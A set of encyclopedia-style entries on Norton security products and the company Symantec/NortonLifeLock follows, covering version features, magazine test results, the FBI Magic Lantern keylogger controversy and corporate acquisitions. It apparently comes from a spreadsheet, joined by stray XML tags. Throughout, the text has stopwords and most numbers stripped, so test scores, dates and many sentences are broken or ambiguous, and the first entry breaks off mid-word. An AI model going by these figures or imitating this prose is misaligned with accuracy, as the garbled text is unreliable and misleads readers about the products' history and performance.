dropped, parental controls information filtering bundled. installation noted quick simple magazine cnet. installation required reboot, afterwards security assistant guides users questionnaire best configure service. cnet encountered problem upgrading prior release: customized settings lost. magazine found default settings, aimed avoiding frequent notifications, somewhat permissive. windows support dropped.running full scan compiled list internet-enabled applications. users permissions accepted norton's defaults. firewall detected blocked port scans logged intrusion attempts. this version trace attackers. ensure rogue programs could masquerade trustworthy applications, norton verifies programs list digital signatures known programs. update tracker warned users hackers attempted gain access. firewall blocked access attempts shields port checker. this version included wizard simplify firewall setup accommodate multiple computers sharing internet connection. with release, norton could prevent specified personal information access compatible instant messenger client, e-mail, websites. ad-blocking included trashcan, users could place escaped ad-filtering.a professional edition announced december 2001, aimed towards business owners. this version featured norton intrusion detection, intercepted suspicious connections attacks, code worm. intrusion detection focused windows-based attacks. central management available. administrators configured firewall productivity settings client computers. productivity settings allowed administrators block newsgroups, websites, advertisements. suite integrated user accounts; settings could personalized. 2003 (6.x) version 2003 announced september 2002. this version added norton spam alert reduce spam. filter scanned whole message context, rather looking keywords. pop3 client used. when message identified spam, norton inserted phrase, default "spam alert:", subject line. users could create rule delete move flagged messages. users could create strings text spam alert screen classifying messages. magazine testing, spam alert mistakenly classified percent legitimate e-mail spam. percent spam slipped past filter. although false positive rate low, feature fare well finding actual spam.the updated main interface offered green indicators show features active needed attention. firewall updated features. block traffic button main interface blocks incoming outgoing internet traffic url. another feature, visual tracker, graphically mapped attacks origin. firewall blocked port scans conducted cnet, stealthing one. following nimda code worms, version scanned incoming outgoing traffic suspicious data exchanges routinely updated database, feature ported norton internet security 2002 professional edition. connection offending computer automatically severed traffic matches database item.symantec announced professional edition november 2002. data recovery tools allow users recover deleted malware-damaged files. inclusion data erasure tool allowed users delete files minimizing chance recovery. cleanup removes browser cache files, history, cookies. maintain dial-up connections, connection keep alive simulates online activity periods user inactivity. norton productivity control enables users filter internet content block newsgroups. when used user access manager, multiple filtering profiles could created, assigned different users. 2004 (7.x) announced september 2003, version 2004 adds adware, spyware, keylogger protection. magazine found added protection weak. spyware samples norton detected, significant number removed completely, requiring manual removal. norton little prevent spyware infections.norton antispam, renamed spam filtering feature, spam rules, cannot viewed edited. whitelists blacklists senders could created. users create spam definitions. antispam integrates outlook, outlook express, eudora, allowing users e-mail spam on-the-fly. e-mail identified spam either quarantined default, however feature could configured delete messages automatically. cnet testing, antispam correctly identified percent spam messages.product activation introduced* after installation, users allowed 15-day grace period activate copy norton internet security 2004. program work deadline without 24-character product key. product used activate copy norton internet security ties alphanumeric code based computer's hardware configuration. users activate product five times product key, however licensing terms dictate users allowed install norton internet security 2004 computer. 2005 (8.x) symantec introduced version 2005 august 2004. this version sometimes referred tagline antispyware edition, since spyware detection integrated norton default enabled. found threats listed, separating ones already dealt ones requiring user interaction. more detailed information provided link symantec's website. however, magazine noted lengthy scan times. full scan took minutes half hour, respectively. testing, norton detected percent spyware samples, compared average percent tested products. removal rates average, percent versus average percent. norton blocked reinstallation score percent, compared group average percent. overall, norton ranked fifth among tested products. magazine testing, norton installed slowly infected systems failed install altogether. contacting symantec resolve issue.internet worm protection could block worms, scan addresses open ports. blocks inbound ports based known suspected exploits using signatures heuristics. addition feature follows msblast 2003 sasser 2004, worms exploited vulnerability microsoft windows' operating systems. response emerging privacy threats percent threats last months attempted steal confidential information version adds phishing protection. using firewall component, users could create whitelist sites confidential information could transmitted. users alerted information transmitted site list. outbreak alert feature warns users major threats classified symantec, users could press button applies changes close vulnerabilities, blocking necessary ports used propagating worm. browser privacy could suppress information website generally receive visitors, browser operating system used. feature could block advertisements. privacy control could warn users sending confidential information. could configured block transmission. allowed users specify information could sent, e-mail. item-specific exceptions allow users control data could sent. however, found flaw information filtering feature. format information list confidential information could limit effectiveness. example, entering last digits credit card number stop numbers leaking grouped four digits. magazine noted fact anyone could login computer could view database private information. reason, symantec recommends entering last portion sensitive information.norton antispam scanned e-mails spoofed urls deals offending e-mail spam. e-mails could blocked based language, however default filter allowed languages. antispam could sync list allowed senders pop3 address books. users could train spam filter pointing valid e-mail marked spam vice versa. support yahoo! mail hotmail added* 2006 (9.x) norton internet security 2006 debuted september 2005. main interface, norton protection center, aggregates information central location. security status shown secure computer tasks e-mail internet browsing, context features enabled. protection center could recognize third-party software protecting computer. interface advertises additional products symantec; categories protection, "data protection", read coverage" user purchases installs norton systemworks. additional system tray icon created protection center. installation noted lengthy magazine, especially malware-infected systems. spyware detection tweaked since last release. updated better identify keyloggers. magazine testing, norton successfully detected spyware threats removed two. magazine give norton credit even manual removal required. suite removed three four commercial keyloggers. when attempting install spyware clean system, norton blocked four commercial keyloggers. cases, block installation, however norton call scan spyware installed. testing, norton detected percent spyware, removed percent, blocked percent installing. norton antispam discontinued separate product symantec, available norton internet security. feature could block e-mail unknown senders, automatically blocks messages suspicious elements invisible text, html forms, phishing urls. improve accuracy, norton analyzes outgoing e-mails messages whose categorization corrected users hitting "this spam" "this spam" buttons. magazine testing, feature marked valid e-mail spam every spam messages inbox. messages used, program allowed process messages week. testing, feature performed better, blocking percent spam, false positive rate percent. norton recommends disabling windows firewall avoid redundant alerts. firewall stealthed significant ports magazine testing. attacking firewall unsuccessful, magazine unable stop service, terminate process, disable firewall using simulated mouse clicks. firewall passed pro's tests, successfully stealthing ports. other features included bloodhound technology, looks virus-like behavior better find zero viruses. security inspector looks common vulnerabilities, including insecure user account passwords browser insecurities. advertisement blocking rewrites website's html prevent advertisements displayed. parental controls, optional component, could block certain programs accessing internet, clients, restrict newsgroup access. restrictions could assigned different windows users accounts. sites classified categories, four profiles could assigned block different categories sites. supervisors define exceptions, global blocked sites, block access sites user-created whitelist. both magazine noted exclusion time-based restrictions. information filtering could controlled per-user basis. windows compatibility dropped release. 2007 (10.x) 2007 version announced september 2006. tabbed interface allowed users access norton protection center program settings without separate tray icons windows open. symantec revised norton internet security made version modularized, reduced suite's memory usage 10–15 megabytes scan times 30–35 percent. another result spam filtering parental controls became separate components. when installed, features consumed disk space.anti-phishing integrated internet explorer. analyzes sites, examining website's url, title, form, page layout, visible text links, uses blacklist detect phishing sites. users blocked access suspected phishing sites, however presented option continue. magazine testing, feature blocked phishing sites, internet explorer recognized sites. testing, feature successfully blocked access every phishing site tested against. spam filtering longer included language feature, symantec claimed less useful current spam created false positives. tested 1,500 messages magazine, norton half spam inbox. five percent valid mail marked spam. this version utilized symantec's veritas vxms technology better identify rootkits. vxms allowed norton find inconsistencies among files within directories files volume level. startup application manager allowed users prevent applications launching login. this release dropped support windows 2000 compatible windows vista upon release update.the firewall made decisions lessen chance disruption misinformed decision. applications known safe allowed internet access, vice versa malicious applications. unknown ones analyzed blocked exhibited malicious behavior. magazine testing, firewall incorrectly block safe applications internet access. malware blocked firewall. magazine testing reflected results. firewall stealthed ports. exploits blocked intrusion prevention system, prevented threats leveraging vulnerabilities. system updated whenever vulnerability identified. attempts disable firewall unsuccessful; registry changes, process termination, simulated mouse clicks failed. disabling windows services effect firewall since worked kernel driver level. this version automatically adjusted configuration different networks based physical address gateway rather addresses.in magazine testing, norton detected spyware samples. removed. against eight commercial keyloggers, suite removed samples. clean system, norton blocked spyware samples installing, stopped seven eight keyloggers installing. 2008 (15.x) 2008 version announced august 2007, adding support windows vista 64-bit. features included sonar, norton identity safe, browser defender. sonar monitored applications malicious behavior. identity safe superseded information filtering function; instead blocking personal information leaving computer, stored personal information fill webforms. password protected checked website's authenticity filling forms. browser defender inspected blocked suspicious calls, intended stop drive-by downloads. network identified networked computers norton internet security 2008 installed. remote monitoring allowed checking status installations different computers; problems identified icon. using feature, users could control traffic computers. warned users using unencrypted wireless network. startup application manager advertisement blocking features dropped release. information filtering, although superseded identity safe suite, available separately. could used conjunction identity safe.phishing protection integrated mozilla firefox. testing magazine found norton blocked percent phishing sites, compared percent internet explorer percent firefox cnet identified issue feature: anti-phishing disabled, identity safe still offered automatically submit personal information websites, including phishing sites. symantec declined call "flaw", stating recommended identity safe anti-phishing enabled. alternatively, identity safe could used firefox internet explorer's built-in anti-phishing capability.pc magazine found firewall ports stealth mode. firewall blocked leak tests, used malware could evade firewall's control network traffic. previous versions identify tests none carried malicious payload. another test conducted using core impact, successfully exploited vulnerability test computer. however, components norton stopped exploit causing harm. attempts unsuccessful either system invulnerable norton's intrusion prevention system stopped attempts disable firewall unsuccessful magazine. contrary, identified open ports computer norton installed.in magazine testing, norton completely detected malware. two-thirds samples, traces removed. norton found removed commercial keyloggers. full scan took nearly hour complete though, twice long 2007 version. suite blocked malware installing commercial keyloggers, regardless modifications made samples. world noted norton removed percent malware-associated files registry entries.spam filtering imported users' address books compile whitelist allowed senders. addresses users send mail e-mail tagged valid mail could automatically added whitelist. using several thousand messages, magazine found norton marked percent valid e-mail spam. over percent valid newsletters marked spam. norton correctly identify percent spam e-mail. 2009 (16.x) 2009 version released sale september 2008. symantec several goals development: complete installations minute footprint average installation times ranged eight minutes, previous 2008 version footprint. other goals included reducing load time computer starts, seconds seconds, file scanning times technology allowed norton skip certain trusted files. technology works basis piece software runs significant proportion computers, safe.a reduction memory consumption made, prompted fact percent people contacting symantec support ram. beta release used memory, compared prior version. reduce scan times, norton insight used data norton community participants avoid scanning files found statistically significant number computers. citing group study finding percent consumers switching antiviruses blamed performance, usage meter allowed users find cause high usage, whether norton another program. updates frequent, termed norton pulse updates. pulse updates delivered every five fifteen minutes (down every eight hours). silent mode automatically suspends alerts updates program enters fullscreen mode could manually enabled. activities took place computer idle, terminate user activity observed. spam filtering became part bundle. this release bundled norton safe web, identified malicious websites, compatible internet explorer firefox. norton safe color coded search results search engines google yahoo safety. norton safe toolbar included ask.com search box. search share code toolbar; instead redirected queries search engine. benchmarking conducted passmark software highlighted second install time, second scan time, memory utilization. symantec funded benchmark test provided scripts used benchmark participating antivirus software. tests conducted windows vista running dual core processor. magazine found suite added seconds boot time, baseline seconds. norton added less percent time takes complete file operations. percent time taken unzip files.norton able remove commercial keyloggers, beating tested products. norton blocked attempts install malware clean system. modifications made samples fool norton. norton able block installation commercial keyloggers. phishing protection blocked percent verified phishing websites magazine testing. internet explorer caught percent, firefox caught percent. norton stealthed ports, according magazine. port scans unsuccessful. firewall blocked exploit attempts core impact. malware blocking removal garnered good results magazine testing. malware sample contained within folder removed folder opened. last removed executed. modifications made samples affect detection. similar test, specifically using commercial keyloggers, norton successfully detect all. removing threats, norton almost completely removed percent malware samples related executables. 2010 (17.x) version 2010 released officially september 2009. this version featured project quorum, introduced reputation-based threat detection keep million attacks month, many symantec claimed evade signature based detection. approach relied norton community watch, participants supply information applications running computers. safe applications exhibit common attributes, known origin known publishers. conversely, malware unknown publisher, among attributes. using data "reputation score" used infer likelihood unknown application safe, malicious.other facets quorum parental controls spam filtering. norton internet security 2010 bundled free subscription onlinefamily.norton, magazine found improvement parental controls bundled prior releases. spam filtering used technologies symantec acquired brightmail. filters used find spam: locally installed check symantec's servers message known spam. magazine testing, valid e-mail marked spam. however, percent spam still reached inbox. this significant improvement prior releases. improved sonar heuristic leveraged reputation data judge program malicious. norton insight expanded, showing users number norton community participants certain program installed, impact system resources, long released. information program's origin graph resource usage provided. autospy helped users understand norton malware found. malware's actions norton's resolution presented user. previous releases removed threats sight quietly warned users, potentially confusing users deceived downloading rogue security software.with compatible graphics card flip screen allowed main display "flip over" show opposite side main interface, consisting chart memory usage timeline security events. otherwise flip screen link replaced back link, opened back windows separate window.safe search allowed user filter unsafe sites, insight them, keep track http cookies. malware removal blocking performed well, setting meeting records magazine testing. achieved detection rate (highest antivirus products). exception blocking commercial keyloggers, norton made average score. file operations took percent longer, file compression extraction test took percent longer. area norton introduced significant delay system booting: beta version added percent boot time, significantly longer prior versions. according norton performance comparison website, norton internet security scanned percent faster, percent lighter, installed percent faster leading anti-virus product. av-comparatives awarded norton internet security "best product 2009", bronze award 98.6% detection rate 2010 norton internet security 2010 blocked 99/100 internet threats. 2011 (18.x) norton internet security 2011 released beta testing april 2010. changes included user interface improved malware scanning. symantec released application "scans" user's facebook feed malware links. this application require valid subscription. test sponsored symantec, norton internet security 2011 security suite achieve percent protection score third-party test dennis labs. improved reputation scan provided user easy understand interface files stored user's computer, marking trusted, good, poor, bad. production version released august 2010. features included norton rescue tools. these tools included norton bootable recovery tool norton power eraser.on december 2010, symantec released 18.5 version norton liveupdate. however, update later pulled numerous reports norton forums update causing system instability system scans (both full quick scans). this issue affected customers. symantec later fixed bugs re-released update.following acquisition verisign security symantec, several verisign features incorporated. norton logo added verisign checkmark formerly seen verisign's logo, well several icon changes norton safe norton identity safe features. 2012 (19.x) norton internet security 2012 released september 2011. download insight monitored files safety stability given file. i.e. file stable windows unstable windows users would notified file's instability. enhanced removal tools tightly integrated better cleanup infected systems. once triggered, new, powerful version norton power eraser restarted system locate remove fake antivirus software deeply embedded threats otherwise hard remove. tool called norton management helped manage different computers devices single location. other changes included sonar google chrome compatibility identity safe safe ability store passwords notes cloud. however, license agreement guarantee passwords stored securely provided remedy cloud vault compromised.the user interface simplified three buttons. third button opened advanced complicated menu, user able manage settings access different product features. meter removed norton 2011, returned (only "advanced screen"). combining netbook desktop line, norton internet security integrated bandwidth metering, controlled product's traffic usage reduces minimum necessary. this ideal networks limited traffic., user interface window adjusted according size computer screen. this version norton internet security included several easter eggs. pressing shift+1, would change theme default background (plain black), ray, animals, floral respectively. holding control pressing "performance button" activate "crazy flip", made window flip head heels. effect would continue main window closed reopened. scans scheduled symantec's proprietary scheduler, performed tasks computer idle. 20.x (2013) version (2013) began "version-less" approach dropping 20xx naming convention, automatically updated releases become available. notable changes included user interface better suited touchscreen devices, social networking protection, protect threats targeted social networks, first release officially support windows version 21.x (2014) this version, released october 2013, became last version marketed symantec. norton internet security, along norton antivirus norton 360, replaced norton security. version 22.x (2015) version 22.5 update released june 2015. included restyled user interface windows support. norton security september 2014 norton internet security folded norton security, part symantec's streamlined norton line. netbook edition symantec released special edition norton internet security optimized netbooks. this available download symantec website thumb drive. symantec stated netbook edition optimized netbooks. main display optimized provide support screen resolution. addition, non-critical tasks delayed netbook battery. furthermore, netbook edition offered complimentary access norton's secure online backup parental control protect children. macintosh edition version norton internet security version released november 2000. could identify remove windows viruses. other features included firewall, advertisement blocking browser, parental controls, ability prevent confidential information transmitted outside computer. users prompted information transmitted. incorporation aladdin systems' iclean allowed users purge browser cache, cookies, browsing history within norton's interface. supported 8.1. hardware requirements called ram, disk space, powerpc processor. version norton internet security version released 2002. version tied whois database, allowing users trace attacking computers. users could inform network administrators attacking computers corrective actions. when running powerpc processor, ram, free space required. under 10.1, powerpc processor, ram, free space required. version norton internet security version released 2003. subsequent release, version 3.0, maintained feature found version 2.0. firewall allocated internet access needed rather relying user input using predefined rules. compatibility dropped. when running 9.2, powerpc processor, ram, free space required. under 10.1.5 10.3, powerpc ram, free space required. however, version compatible 10.4, "tiger". version version released december 2008. symantec marketed bundle version 2009 version windows, intended users microsoft windows installed. iclean dropped release. firewall blocked access malicious sites using blacklist updated symantec. prevent attackers leveraging insecurities installed software, exploit protection introduced* phishing protection introduced* well. 10.4.11 higher supported. powerpc intel core processor, free space required. criticism versions 2009 cooperation symantec, compliance federal bureau investigation (fbi), whitelisted magic lantern, keylogger. purpose magic lantern obtain passwords encrypted e-mail part criminal investigation. magic lantern first reported november 2001. magic lantern deployed e-mail attachment. when attachment opened, trojan horse installed suspect's computer. trojan horse activated suspect used encryption, often used increase security sent e-mail messages. when activated, trojan horse password, allowed decrypt user communications. symantec major antivirus vendors whitelisted magic lantern. concerns included uncertainties magic lantern's full potential whether hackers could subvert purposes outside law.graham cluley, technology consultant sophos, said, knowing written fbi, even did, wouldn’t know whether used commandeered third party". another reaction came marc maiffret, chief technical officer cofounder eeye digital security, "our customers paying service, protect forms malicious code. enforcement's not, not, make exceptions enforcement malware tools."fbi spokesman paul bresson, response question whether magic lantern needed court order deployed, said, "like technology projects tools deployed would used pursuant appropriate legal process."proponents magic lantern argue technology would allow enforcement efficiently quickly decrypt messages protected encryption schemes. unlike predecessor, carnivore, implementing magic lan</t>
  </si>
  <si>
    <t>Norton Personal Firewall</t>
  </si>
  <si>
    <t>norton personal firewall, developed symantec, discontinued personal firewall blocking, program control privacy protection capabilities. norton personal firewall program control module able allow deny individual applications access internet. programs automatically allowed denied internet access norton personal firewall. uses blacklist whitelist determine whether program allowed internet access.the advertisement-blocking feature software rewrites html one's browser uses display pages. searches code related advertisements blacklist prevents page displayed. privacy control component blocks browser cookies active content, prevents transmission sensitive data standard pop3 e-mail clients, microsoft office e-mail attachments instant messaging services messenger, windows messenger instant messenger without user's consent. also internet security comparison antivirus software comparison firewalls references</t>
  </si>
  <si>
    <t>Norton Security</t>
  </si>
  <si>
    <t>norton security cross-platform security suite provides subscription-based real-time malware prevention removal addition identity theft protection performance tuning tools. other features include personal firewall, email spam filtering, phishing protection. released september 2014 part symantec's streamlined norton line, replaces long-running norton internet security flagship antivirus product. version history 2014, effort streamline norton product line, symantec combined nine standalone norton products all-purpose suite. norton security superseded norton internet security (and pre-2019 versions norton 360), overlapping release cycle version initial release former final release latter. however, version norton norton internet security updates opposed full releases. terms similarities differences predecessors, norton security retained components norton internet security (including antivirus, firewall identity theft components) added optimization tools norton 360. norton security available three editions: norton security standard license (valid single device), norton security deluxe five licenses norton security premium offers licenses, hosted online backup, premium subscription symantec's parental control system. editions include protection windows, android devices. however, features vary based operating system. april 2019, norton brand reinstated, maintaining similar plan structure addition and, premium tiers, lifelock (which acquired symantec 2017). system requirements operating systems supported (norton security 22.16.0.247 windows) microsoft windows (all versions) service pack later microsoft windows 8/8.1 (all versions). some protection features available windows start screen browsers. microsoft windows (all versions). operating systems (norton security build mac) macos 10.10 later android operating systems (norton mobile security 4.5.0 android) android later operating systems (norton security 1.1.5 ios) later also norton sonar comparison antivirus software references external links official site</t>
  </si>
  <si>
    <t>Norton Zone</t>
  </si>
  <si>
    <t>norton zone cloud file sharing online backup tool service operated symantec used share, sync, access, store, backup data. also allows file collaboration commenting. norton zone accessible apps windows, windows android, mac, platforms. norton zone uses encrypted replicated cloud storage provides client-side encryption.as leading antivirus provider norton antivirus software, symantec distinguishes norton zone competition automatically scanning files malware viruses.norton zone offered storage free larger storage allocations subscription.on june 2014, symantec announced norton zone would discontinued august 2014. references</t>
  </si>
  <si>
    <t>NortonLifeLock</t>
  </si>
  <si>
    <t>nortonlifelock inc., formerly known symantec corporation american software company headquartered tempe, arizona, united states. company provides cybersecurity software services. nortonlifelock fortune company member stock-market index. company also development centers pune, chennai bangalore. october 2014, symantec declared would split independent publicly traded companies 2015. company would focus security, information management. january 2016, symantec sold information-management subsidiary, named veritas technologies (which symantec acquired 2004) carlyle group.the name "symantec" portmanteau words "syntax" "semantics" "technology".on august 2019, broadcom inc. announced would acquiring enterprise security software division symantec $10.7 billion, attempted purchase whole company. sale closed november 2019, subsequently, company adopted nortonlifelock name. also relocated headquarters tempe, arizona mountain view, california. history 1982 1989 founded 1982 gary hendrix national science foundation grant, symantec originally focused artificial intelligence-related projects, including database program. hendrix hired several stanford university natural language processing researchers company's first employees.in 1984, became clear advanced natural language database system symantec developed could ported minicomputers this left symantec without product, expertise natural language database query systems technology. result, later 1984 symantec acquired another, smaller software startup company, software, founded denis coleman gordon eubanks headed eubanks. software developed combined file management word processing program called q&amp;a. barry greenstein, professional poker player, principal developer word processor component within q&amp;a.the merged company retained name symantec. eubanks became chairman, vern raburn, former president original symantec, remained president combined company. symantec combined file management word processing functionality planned, added advanced natural language query system (designed gary hendrix engineered gordon) standards ease database query report generation. natural language system named "the intelligent assistant". turner chose name symantec's flagship product, large part name lent short, easily merchandised logo. brett walter designed user interface (brett walter, director product management). released november 1985. during 1986, vern raburn gordon eubanks swapped roles, eubanks became president symantec, raburn became chairman. after change, raburn little involvement symantec, years, eubanks added chairmanship roles. after slow start sales fall 1985 spring 1986, turner, symantec executive, signed advertising agency called elliott/dickens, embarked aggressive advertising campaign, came "six pack program" symantec employees, regardless role, went road, training selling dealer sales staff nationwide united states. turner named pack employees work days week, dealerships day, train sales representatives store stay friends free motel simultaneously, promotion jointly sofsell (which symantec's exclusive wholesale distributor united states first year market). this promotion successful encouraging dealers q&amp;a. during time, symantec advised board members lally john doerr would expenses grow revenues enough achieve cash flow break-even, kleiner perkins caufield byers would back company raising venture capital. accomplish this, management team worked salary reduction schedule chairman would take zero pay, vice presidents would take cut, employees' 15%. employees laid off. eubanks also negotiated sizable rent reduction office space company leased days original symantec. these expense reductions, combined strong international sales q&amp;a, enabled company attain break-even. significantly increased traction re-launch grew symantec's revenues substantially, along early success international markets (uniquely german version shipped three weeks united states version, first software world supported german natural language) following turner's emphasized establishing international sales distribution multiple language versions initial shipment. 1985, turner negotiated publishing agreement david whitney symantec's second product, turner named noteit annotation utility lotus 1-2-3). evident turner noteit would confuse dealer channel launched symantec name symantec built interest stage (but shipped it), price utility would initially attracted dealer channel demand built turner felt product marketed unique brand name. turner gordon eubanks jr., chairman symantec corporation, agreed form division symantec, eubanks delegated choice name turner. turner chose name turner hall publishing, division symantec devoted publishing third-party software hardware. objective division diversify revenues accelerate growth symantec. turner chose name turner hall publishing, using last name dottie hall (director marketing communications) convey sense stable, long-established, company. turner hall publishing's first offering note-it, notation utility add-in lotus 1-2-3, developed david whitney, licensed symantec. second product turner hall card, 256k ram, half slot memory card, initially made inexpensively increase available memory symantec's flagship product, q&amp;a. turner hall division also marketed card standalone product. turner hall's third product, also 1-2-3 add-in sqz! lotus 1-2-3 spreadsheet compression utility developed chris graham synex systems. summer 1986 eubanks turner recruited byers digital research, expand turner hall publishing product family lead turner hall effort. winter 1986–87, turner hall publishing division achieved success noteit, turner hall card sqz!. popularity products, contributing relatively small portion revenues symantec, conveyed impression symantec already diversified company, indeed, many industry participants impression symantec acquired turner hall publishing. 1987, byers recruited schlein turner hall product group assist building product family marketing. revenues q&amp;a, symantec's early launch international marketplace, combined turner hall publishing, generated market presence scale enabled symantec make first merger/acquisition, february 1987, breakthrough software, maker timeline project management software dos. because first time symantec acquired business revenues, inventory, customers, eubanks chose change nothing breakthrough software months, actual merger logistics started summer 1987, turner appointed eubanks general manager timeline business unit, turner made responsible successful integration company symantec ongoing growth business, p&amp;l. there heavy emphasis placed making minimum disruption eubanks turner. soon acquisition timeline/breakthrough software, eubanks reorganized symantec, structuring company around product-centric groups, development, quality assurance, technical support, product marketing functions, general manager profit loss responsibility. sales, finance, operations centralized functions shared. this structure lent well symantec's growth mergers acquisitions. eubanks made turner general manager timeline product group, simultaneously product group, made byers general manager turner hall product group. turner continued build lead company's international business marketing whole company. timeline product group, turner drove strong marketing, promotion sales programs accelerate momentum. 1989 merger successful—product group morale high, timeline development continued apace, increased sales marketing efforts applied built timeline clear market lead project management software dos. both timeline product groups healthily profitable. profit stream merger success stage subsequent merger acquisition activity company, indeed funded losses product groups subsequently acquired. 1989, eubanks hired john laing worldwide sales, turner transferred international division laing. eubanks also recruited dykes executive vice president operations finance, anticipation upcoming ipo. july 1989 symantec ipo. 1990 1999 1990, symantec announced intent merge acquire peter norton computing, developer various utilities dos. turner appointed product group manager norton business, made responsible merger, responsibility. schlein made product group manager business. peter norton group merger logistical effort began immediately companies sought approval merger, august 1990, symantec concluded purchase—by time combination companies already complete. symantec's consumer antivirus data management utilities still marketed norton name. time merger, symantec built upon turner hall publishing presence utility market, introducing symantec antivirus macintosh (sam), symantec utilities macintosh (sum). these products already market leaders mac, success made norton merger strategic. symantec already begun development dos-based antivirus program year merger norton. management team decided enter antivirus market part felt antivirus market entailed great deal ongoing work stay ahead viruses. team felt microsoft would unlikely find effort attractive, would lengthen viability market symantec. turner decided norton name obvious reasons, became norton antivirus, turner norton team launched 1991. time merger, norton revenues approximately combined entity. 1993, turner, norton product group revenues grown approximately symantec's total. time symantec also known development tools, particularly think pascal, think symantec c++, enterprise developer visual cafe packages popular macintosh compatible platforms. these product lines resulted acquisitions made company late 1980s early 1990s. these businesses living videotext acquisition consistently unprofitable symantec, losses diverted expenditures away windows timeline windows development efforts critical period 1988 1992. symantec exited business late-1990s competitors metrowerks, microsoft borland gained significant market share. 1996, symantec corporation alleged misleading financial statements violation gaap. 2000 present from 1999 april 2009, symantec john thompson, former ibm. time, thompson african-american leading major technology company. succeeded april 2009 company's long-time symantec executive enrique salem. under salem, symantec completed acquisition verisign's certificate authority business, dramatically increasing share market. 2009, symantec released list "100 dirtiest websites", contain malware detected norton safe web. salem abruptly fired 2012 disappointing earnings performance replaced steve bennett, former intuit executive. january 2013, bennett announced major corporate reorganization, goal reducing costs improving symantec's product line. said sales marketing "had high costs provide quality outcomes". concluded "our system broken".robert enderle cio.com reviewed reorganization noted bennett following general electric model product-focused instead customer-focused. concluded "eliminating middle management removes large number highly paid employees. this tactically improve symantec's bottom line reduce skills needed ensure high-quality products long term."in march 2014, symantec fired steve bennett position named michael brown interim president chief executive. including interim ceo, symantec ceos less years. september 2014, symantec announced appointment michael brown president chief executive officer. brown served company's interim president chief executive officer since march 2014. brown served member company's board directors since july 2005 following acquisition veritas software corporation. brown served veritas board directors since 2003.in july 2016, symantec introduced product help carmakers protect connected vehicles zero-day attacks. symantec anomaly detection automotive product manufacturers uses machine learning provide in-vehicle security analytics. greg clark assumed position august 2016.in november 2016, symantec announced intent acquire identity theft protection company lifelock $2.3 billion.in august 2017, symantec announced agreed sell business unit verifies identity websites thoma bravo. with acquisition, thoma bravo plans merge symantec business unit certification company, digicert.on january 2018, symantec (formerly british telecom) announced partnership provides endpoint security protection.in 2018, symantec initiated internal audit address concerns raised former employee, causing delay annual earnings report.in august 2018, symantec announced hedge fund starboard value forward five nominees stand election symantec board directors symantec's 2018 annual meeting stockholders. this followed schedule filing starboard showing accumulated 5.8% stake symantec. september 2018, symantec announced three nominees starboard joining symantec board, immediate effect (including starboard managing member peter feld) following 2018 annual meeting stockholders.on 2019, symantec announced clark would stepping board member rick hill, previously forward starboard, appointed interim president ceo. vincent pilette also joined symantec cfo.on august 2019, broadcom announced would acquiring enterprise software division symantec $10.7 billion. this attempted purchase whole company. norton family products remain symantec portfolio. sale closed november 2019, subsequently, company adopted nortonlifelock name relocated headquarters mountain view, california lifelock's offices tempe, arizona.in 2021 2022, first case suspected crypto-miner norton product called norton crypto. norton crypto mines ethereum (eth) computer idle. program creates secure wallet computer. demerger october 2014, symantec declared company would separate independent publicly traded companies 2015. symantec continue focus security, company established focusing information management. symantec confirmed january 2015, information management business would called veritas technologies corporation, marking return veritas name. august 2015, symantec agreed sell veritas private equity group carlyle group billion. sale completed february 2016, turning veritas privately owned company. norton products 2015, symantec's norton product line includes norton security, norton small business, norton family, norton mobile security, norton online backup, norton360, norton utilities norton computer tune up.in 2012, pctools iantivirus rebranded norton product name iantivirus, released store. also 2012, norton partner portal relaunched support sales consumers throughout emea technologies. mergers acquisitions act! 1993, symantec acquired act! contact software international. symantec sold act! saleslogix 1999. time world's popular application windows macintosh. veritas december 2004, veritas software symantec announced plans merger. with veritas valued $13.5 billion, largest software industry merger date. symantec's shareholders voted approve merger june 2005; deal closed successfully july 2005. july 2005, first business u.s. offices new, combined software company. result merger, symantec includes storage- availability-related products portfolio, namely veritas file system (vxfs), veritas volume manager (vxvm), veritas volume replicator (vvr), veritas cluster server (vcs), netbackup (nbu), backup exec (be) enterprise vault (ev).on january 2016, symantec sold veritas technologies carlyle group. sygate august 2005, symantec acquired sygate, security software firm based fremont, california, staff. november 2005, sygate personal firewall products discontinued. altiris january 2007, symantec announced plans acquire altiris, april 2007, acquisition completed. altiris specializes service-oriented management software allows organizations manage assets. also provides software services, security systems management products. established 1998, altiris headquartered lindon, utah. vontu november 2007, symantec announced acquisition vontu, data loss prevention (dlp) company, $350 million. application performance management business january 2008, symantec announced spinning application performance management (apm) business product line vector capital. precise software solutions took development, product management, marketing sales business, launching independent company september 2008. tools august 2008, symantec announced signing agreement acquire tools. under agreement, tools would maintain separate operations. financial terms acquisition disclosed. 2013, symantec announced discontinuing tools line internet security software.in december 2013, symantec announced discontinuing retiring entire tools brand offering non-expiring license tools performance toolkit, tools registry mechanic, tools file recover tools privacy guardian users active subscription december 2013. appstream april 2008, symantec completed acquisition appstream, inc. (“appstream”), nonpublic palo alto, california-based provider endpoint virtualization software. appstream acquired complement symantec's endpoint management virtualization portfolio strategy. messagelabs october 2008, symantec announced intent acquire gloucester-based messagelabs (spun star internet 2007) boost software-as-a-service (saas) business. symantec purchased online messaging security provider $695 million cash. acquisition closed november 2008. guardianedge april 2010, symantec announced intent acquire corporation guardianedge. acquisitions closed june 2010, provided access established encryption, management technologies symantec's customers. verisign authentication 2010, symantec signed definitive agreement acquire verisign's authentication business unit, included secure sockets layer (ssl) certificate, public infrastructure (pki), verisign trust verisign identity protection (vip) authentication services. acquisition closed august 2010. august 2012, symantec completed rebranding verisign certificate service renaming verisign trust seal norton secured seal. symantec sold unit digicert us$950 million 2017. rulespace acquired october 2010, rulespace categorisation product first developed 1996. categorisation automated using symantec refers automated categorization system (acs). used base content filtering many isp. clearwell systems 2011, symantec announced acquisition clearwell systems approximately $390 million. liveoffice january 2012, symantec announced acquisition cloud email-archiving company liveoffice. acquisition price $115 million. last year, symantec joined cloud storage backup sector enterprise vault.cloud cloud storage enterprise vault software, addition cloud messaging software, symantec instant messaging security cloud (ims.cloud). symantec stated acquisition would information governance products, allowing customers store information on-premises, symantec's data centers, both. odyssey software march 2012, symantec completed acquisition odyssey software. odyssey software's main product athena, device management software extended microsoft system center software, adding ability manage, support control mobile embedded devices, smartphones ruggedized handhelds. nukona inc. symantec completed acquisition nukona, provider mobile application management (mam), april 2012. acquisition agreement symantec nukona announced march 2012. nitrodesk inc. 2014 symantec acquired nitrodesk, provider touchdown, market-leading third-party mobile application. blue coat systems june 2016, announced symantec acquired blue coat $4.65 billion. lifelock 2017, symantec acquired lifelock inc.; this, turn, prompted 